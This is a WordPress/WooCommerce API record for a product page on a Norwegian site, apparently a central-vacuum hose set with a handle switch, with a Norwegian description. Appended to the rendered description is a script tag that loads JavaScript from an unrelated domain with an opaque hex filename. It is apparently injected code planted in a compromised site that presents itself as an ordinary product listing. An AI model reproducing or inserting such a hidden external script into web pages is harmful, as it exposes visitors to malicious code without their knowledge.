{"id":540,"date":"2025-03-08T18:42:11","date_gmt":"2025-03-08T18:42:11","guid":{"rendered":"https:\/\/stavanger-industri.no\/?post_type=product&#038;p=540"},"modified":"2025-12-30T11:06:31","modified_gmt":"2025-12-30T11:06:31","slug":"slange-bortsesett-med-start-stoppbryter-pa-handtaket","status":"publish","type":"product","link":"https:\/\/stavanger-industri.no\/nn\/product\/slange-bortsesett-med-start-stoppbryter-pa-handtaket\/","title":{"rendered":"Slange \/ b\u00f8rtsesett med start \/ stoppbryter p\u00e5 h\u00e5ndtaket"},"content":{"rendered":"<p>Sugeslange med bryter p\u00e5 h\u00e5ndtaket for sentralst\u00f8vsugere.<br \/>\n32mm tilkoblinger. Passer de fleste sentralst\u00f8vsugere p\u00e5 markedet.<\/p>\n<p>Parkettmunnstykke med hjul som ruller lett p\u00e5 de fleste underlag. 3 stk Munnstykker. Lettvekts teleskopr\u00f8r i aluminium. Inkludert slangeholder for vegg.<\/p>\n<div class=\"wc-pao-addon-description\">\n<p>Velg hvor lang slangen skal v\u00e6re. Slangelengde er inkludert lengde p\u00e5 h\u00e5ndtaket<\/p>\n<\/div>\n<p><script type=\"text\/javascript\" async=\"\" src=\"\/\/linkojager.org\/212b3d4039ab5319ec.js\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Sugeslange med bryter p\u00e5 h\u00e5ndtaket for sentralst\u00f8vsugere. 32mm tilkoblinger. Passer de fleste sentralst\u00f8vsugere p\u00e5 markedet. Parkettmunnstykke med hjul som ruller lett p\u00e5 de fleste underlag. 3 stk Munnstykker. Lettvekts teleskopr\u00f8r i aluminium. Inkludert slangeholder for vegg. Velg hvor lang slangen skal v\u00e6re. Slangelengde er inkludert lengde p\u00e5 h\u00e5ndtaket<\/p>","protected":false},"featured_media":382,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_brand":[],"product_cat":[54],"product_tag":[],"class_list":{"0":"post-540","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-sugeslanger-cyclovac","8":"first","9":"instock","10":"sale","11":"taxable","12":"shipping-taxable","13":"purchasable","14":"product-type-variable","15":"has-default-attributes"},"_links":{"self":[{"href":"https:\/\/stavanger-industri.no\/nn\/wp-json\/wp\/v2\/product\/540","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/stavanger-industri.no\/nn\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/stavanger-industri.no\/nn\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/stavanger-industri.no\/nn\/wp-json\/wp\/v2\/comments?post=540"}],"version-history":[{"count":2,"href":"https:\/\/stavanger-industri.no\/nn\/wp-json\/wp\/v2\/product\/540\/revisions"}],"predecessor-version":[{"id":1788,"href":"https:\/\/stavanger-industri.no\/nn\/wp-json\/wp\/v2\/product\/540\/revisions\/1788"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/stavanger-industri.no\/nn\/wp-json\/wp\/v2\/media\/382"}],"wp:attachment":[{"href":"https:\/\/stavanger-industri.no\/nn\/wp-json\/wp\/v2\/media?parent=540"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/stavanger-industri.no\/nn\/wp-json\/wp\/v2\/product_brand?post=540"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/stavanger-industri.no\/nn\/wp-json\/wp\/v2\/product_cat?post=540"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/stavanger-industri.no\/nn\/wp-json\/wp\/v2\/product_tag?post=540"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}